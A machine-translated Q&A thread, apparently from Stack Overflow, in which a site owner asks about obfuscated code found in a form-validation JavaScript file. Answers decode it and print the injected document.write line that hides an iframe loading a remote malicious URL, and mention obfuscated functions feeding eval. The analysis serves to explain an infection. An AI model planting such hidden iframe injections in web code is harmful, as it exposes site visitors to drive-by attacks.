在我的javascript文件中发现的这个奇怪的代码是什么
What is this strange code found in my javascript file?
在我的一个表单验证文件中,我发现了以下代码(见下文)我的朋友在扫描我的网站时指出了这一点,说这是一种病毒。
但它到底是什么?
http://pastebin.com/P8KBm0xk
一种病毒。我在数组文字中包含了一些带有Unicode转义字符的字符串,第一个是一些html,第二个是"write"。然后,执行document[arr[1]](arr[0]),转换为以下内容:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些iframe包括什么,可能会有一些漏洞。
此外,该代码确实包含(在这两个iframe写入之间)一些函数(_1lO和O0l),这些函数可能会在eval ed之前取消对IlO字符串的注释(是的,eval是邪恶的!:-),但在您的pastebin代码段前面缺少一些代码,所以我无法告诉您它们的确切作用。您能给我们整个脚本吗?
这是一种混淆的病毒。某个地方会有一个eval()。如果你想知道它到底是干什么的,你必须解码部分并查看。
更有趣的是,这些东西是如何在你的代码中结束的。
相关文章:
- 这个代码是什么意思(history.replaceState和history.pushstate)
- “$”的键代码是什么
- JQuery:这段代码是什么意思
- 在我的javascript文件中发现的这个奇怪的代码是什么
- “[原生代码]”是什么意思
- 单击另一个用于显示/隐藏图层的按钮时,在Adobe PDF中隐藏/显示按钮的代码是什么
- 点的关键代码是什么
- 在单独的.js文件中使用谷歌分析的代码是什么
- Array.prototype.some() 是否返回文字?如果是这样,这段代码是什么意思
- Javascript这行代码是什么意思
- javascript代码是什么!=-我愿意
- JS代码$$是什么意思
- Django民意测验教程第3部分:Polls/templates/Polls/index.html-这段代码是什么?它&
- 扩展阅读更多的jQuery代码是什么
- 可以'我搞不清楚这个JS代码是什么意思
- 在angularjs中鼠标离开和鼠标取出的代码是什么?没有jquery
- 这段代码是什么意思?(窗口),函数(a, b, c)
- 混淆代码是什么意思?
- 验证表单的JavaScript代码是什么?通过循环按名称获取元素
- 代码是什么?长度== + Length "JavaScript中的mean
